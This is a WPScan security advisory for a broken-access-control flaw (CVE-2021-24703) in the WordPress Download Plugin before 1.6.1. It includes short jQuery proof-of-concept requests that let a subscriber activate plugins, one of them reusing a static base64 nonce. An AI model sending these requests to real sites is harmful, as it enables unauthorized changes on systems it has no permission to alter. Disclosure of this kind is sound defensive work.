logoWordPressPluginsThemesAPISubmitContact
search-icon
logo
search-icon
WordPressPluginsThemesAPISubmitContactSecurity Scanner
Register

Download Plugin < 1.6.1 - Subscriber+ Arbitrary Plugin Activation

Description

The plugin does not have capability and CSRF checks in the dpwap_plugin_activate AJAX action, allowing any authenticated users, such as subscribers, to activate plugins that are already installed.

Proof of Concept

v < 1.5.9 - jQuery.post(ajaxurl,{ action:"dpwap_plugin_activate", dpwap_url:"hello.php" })

v < 1.6.0 - jQuery.post(ajaxurl,{ action:"dpwap_plugin_activate", dpwap_url:"hello.php", nonce: base64('dpwap-metagauss') })

Affects Plugins

download-plugin

Fixed in version 1.6.1

References

CVE

CVE-2021-24703

Classification

Type

ACCESS CONTROLS

OWASP top 10

A5: Broken Access Control

CWE

CWE-284

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

4ed8296e-1306-481f-9a22-723b051122c0

Timeline

Publicly Published

2021-10-19 (about 3 months ago)

Added

2021-10-19 (about 3 months ago)

Last Updated

2021-10-19 (about 3 months ago)

Our Other Services

WPScan WordPress Security Plugin